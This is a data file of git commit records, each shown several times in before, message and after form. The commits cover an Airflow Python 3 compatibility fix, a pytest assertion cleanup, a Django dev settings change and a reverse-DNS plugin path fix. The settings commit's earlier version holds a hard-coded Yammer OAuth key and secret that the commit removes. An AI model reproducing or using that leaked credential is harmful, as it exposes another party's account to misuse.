low,jfantom/incubator-airflow,modsy/incubator-airflow,brandsoulmates/incubator-airflow,ProstoMaxim/incubator-airflow,ProstoMaxim/incubator-airflow,jwi078/incubator-airflow,akosel/incubator-airflow,N3da/incubator-airflow,sdiazb/airflow,mattuuh7/incubator-airflow,mrares/incubator-airflow,nathanielvarona/airflow,apache/airflow,holygits/incubator-airflow,OpringaoDoTurno/airflow,sergiohgz/incubator-airflow,bolkedebruin/airflow,N3da/incubator-airflow,criccomini/airflow,hgrif/incubator-airflow,gtoonstra/airflow,edgarRd/incubator-airflow,NielsZeilemaker/incubator-airflow,jbhsieh/incubator-airflow,cademarkegard/airflow,skudriashev/incubator-airflow,subodhchhabra/airflow,yk5/incubator-airflow,RealImpactAnalytics/airflow,ProstoMaxim/incubator-airflow,ty707/airflow,edgarRd/incubator-airflow,bolkedebruin/airflow,saguziel/incubator-airflow,hgrif/incubator-airflow,brandsoulmates/incubator-airflow,holygits/incubator-airflow,forevernull/incubator-airflow,biln/airflow,mattuuh7/incubator-airflow,cfei18/incubator-airflow,wileeam/airflow,rishibarve/incubator-airflow,sid88in/incubator-airflow,dhuang/incubator-airflow,OpringaoDoTurno/airflow,KL-WLCR/incubator-airflow,jbhsieh/incubator-airflow,ronfung/incubator-airflow,wxiang7/airflow,ty707/airflow,asnir/airflow,forevernull/incubator-airflow,lyft/incubator-airflow,gtoonstra/airflow,DinoCow/airflow,sekikn/incubator-airflow,plypaul/airflow,dmitry-r/incubator-airflow,lxneng/incubator-airflow,zoyahav/incubator-airflow,aminghadersohi/airflow,owlabs/incubator-airflow,MortalViews/incubator-airflow,juvoinc/airflow,mylons/incubator-airflow,Tagar/incubator-airflow,vineet-rh/incubator-airflow,saguziel/incubator-airflow,KL-WLCR/incubator-airflow,spektom/incubator-airflow,caseyching/incubator-airflow,d-lee/airflow,bolkedebruin/airflow,adrpar/incubator-airflow,Acehaidrey/incubator-airflow,malmiron/incubator-airflow,mylons/incubator-airflow,RealImpactAnalytics/airflow,NielsZeilemaker/incubator-airflow,akosel/incubator-airflow,wooga/airflow,nathanielvarona/airflow,jhsenjaliya/incubator-airflow,holygits/incubator-airflow,jgao54/airflow,asnir/airflow,dud225/incubator-airflow,nathanielvarona/airflow,cademarkegard/airflow,stverhae/incubator-airflow,cademarkegard/airflow,jgao54/airflow,ledsusop/airflow,aminghadersohi/airflow,bolkedebruin/airflow,AllisonWang/incubator-airflow,fenglu-g/incubator-airflow,btallman/incubator-airflow,yiqingj/airflow,artwr/airflow,Twistbioscience/incubator-airflow,danielvdende/incubator-airflow,mtagle/airflow,MetrodataTeam/incubator-airflow,yiqingj/airflow,criccomini/airflow,lyft/incubator-airflow,apache/incubator-airflow,jwi078/incubator-airflow,adamhaney/airflow,fenglu-g/incubator-airflow,easytaxibr/airflow,artwr/airflow,vijaysbhat/incubator-airflow,zodiac/incubator-airflow,ty707/airflow,dgies/incubator-airflow,forevernull/incubator-airflow,mistercrunch/airflow,adamhaney/airflow,zodiac/incubator-airflow,gtoonstra/airflow,lxneng/incubator-airflow,cjqian/incubator-airflow,sergiohgz/incubator-airflow,apache/incubator-airflow,dhuang/incubator-airflow,dgies/incubator-airflow,Acehaidrey/incubator-airflow
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
<commit_before># -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
<commit_msg>Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods<commit_after>
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
<commit_before># -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
<commit_msg>Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods<commit_after># -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
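For context on the one-line rename this record captures: Python 3 removed the func_code attribute on function objects in favour of __code__, which has also existed as an alias since Python 2.6, so the patched form runs on both interpreters. A tiny runnable sketch:
def demo(x):
    return x

# Python 2 spelled this demo.func_code; Python 3 only accepts demo.__code__.
code = demo.__code__
print(code.co_filename, code.co_firstlineno)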
b0b57fd69378c3ed6ee35abd0c45c952a1c52dd1
|
planet_alignment/test/config/bunch_parser.py
|
planet_alignment/test/config/bunch_parser.py
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
Remove superfluous 'is True' from the assert.
|
Remove superfluous 'is True' from the assert.
|
Python
|
mit
|
paulfanelli/planet_alignment
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
Remove superfluous 'is True' from the assert.
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
<commit_before>"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
<commit_msg>Remove superfluous 'is True' from the assert.<commit_after>
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
Remove superfluous 'is True' from the assert."""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
<commit_before>"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
<commit_msg>Remove superfluous 'is True' from the assert.<commit_after>"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
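The change in this record is purely stylistic: isinstance() already returns a bool, so comparing it to True adds nothing. A standalone illustration with an arbitrary sample value:
value = {'key': 1}
# Equivalent to "assert isinstance(value, dict) is True", but shorter and
# friendlier to pytest's assertion introspection when it fails.
assert isinstance(value, dict)
assert not isinstance(value, list)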
fd03c80eb7b705f6f3e9e6c554950ed15a7ecdd4
|
face_it/settings/dev.py
|
face_it/settings/dev.py
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
Remove yammer api key that was accidentally committed
|
Remove yammer api key that was accidentally committed
|
Python
|
cc0-1.0
|
m3brown/face_it,m3brown/face_it,excellalabs/face-off,m3brown/face_it,kave/Face-Off,m3brown/face_it,madridsoccer5/face-off,excellalabs/face-off,kave/Face-Off,excellalabs/face-off,madridsoccer5/face-off,kave/Face-Off,excellalabs/face-off,kave/Face-Off,madridsoccer5/face-off,madridsoccer5/face-off
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
Remove yammer api key that was accidentally committed
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
<commit_before>from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
<commit_msg>Remove yammer api key that was accidentally committed<commit_after>
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
Remove yammer api key that was accidentally committedfrom .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
<commit_before>from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
<commit_msg>Remove yammer api key that was accidentally committed<commit_after>from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
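Not part of the commit itself, but the conventional follow-up to a removal like this one: load credentials from the environment so the settings module can stay in version control. The variable names below mirror the deleted ones purely for illustration:
import os

SOCIAL_AUTH_YAMMER_KEY = os.environ.get('SOCIAL_AUTH_YAMMER_KEY', '')
SOCIAL_AUTH_YAMMER_SECRET = os.environ.get('SOCIAL_AUTH_YAMMER_SECRET', '')
Note that deleting the lines does not scrub them from git history, so rotating the exposed key is the usual companion step.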
8121924b8d056752a31255646b116e9eb6fbbaa6
|
plugins/reversedns.py
|
plugins/reversedns.py
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
Fix bad path for mesh-reverse.db
|
Fix bad path for mesh-reverse.db
|
Python
|
bsd-3-clause
|
heyaaron/openmesher,heyaaron/openmesher,darkpixel/openmesher,darkpixel/openmesher
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
Fix bad path for mesh-reverse.db
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
<commit_before>import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
<commit_msg>Fix bad path for mesh-reverse.db<commit_after>
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
Fix bad path for mesh-reverse.dbimport logging, interfaces, os, IPy
from StringIO import StringIO
